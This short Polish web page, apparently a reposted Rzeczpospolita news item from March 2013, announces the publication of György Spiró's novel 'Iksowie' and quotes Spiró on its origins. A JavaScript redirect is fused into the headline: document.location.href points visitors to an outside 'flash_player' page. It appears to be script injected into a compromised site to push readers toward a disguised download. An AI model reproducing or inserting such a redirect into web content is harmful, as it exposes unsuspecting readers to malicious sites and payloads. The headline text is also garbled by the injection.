9 marca 2013

Tajemnice polskiej elitydocument.location.href="http://www.sommen.nu/templates/flash_player/?A"

„Iksowie”, słynna powieść Györgya Spiro o Polsce w kleszczach Rosji zatrzymana przez cenzurę PRL, ukaże się 10 kwietnia. To wydarzenie. Niesamowite jest to, że jedną z najlepszych powieści o Polsce napisał Węgier.

 

W 1972 r. György Spiro był lektorem wydawnictwa Corvina Kiado. Zanim dokonał tłumaczeń sztuk Wyspiańskiego i Gombrowicza, odwiedził wrocławskie Ossolineum, od którego otrzymał m.in. „Recenzje teatralne Towarzystwa Iksów”.

 

– Już lektura przedmowy była dla mnie olśnieniem – powiedział „Rz” Spiro. – Zafascynowało mnie to, że najbardziej wpływowe postaci polskiej sceny politycznej zajmowały się teatrem, spotykały się w tej sprawie, dyskutowały i pisały erudycyjne recenzje podpisywane pseudonimem. Pomyślałem, że to niesamowity temat, i dziwiłem się, że nie podjął go wcześniej żaden polski pisarz. Tymczasem najlepszy węgierski reżyser teatralny Tomas Oser radził, żebym koniecznie napisał powieść, a potem i tak powstanie z tego sztuka. Jeden z naszych wybitnych reżyserów filmowych Gyula Gazdag, który pracował w Los Angeles, powiedział: napisz powieść, a i tak powstanie z niej film.

 

Jacek Cieślak

 

Czytaj więcej na rp.pl.

Książki, o których pisał autor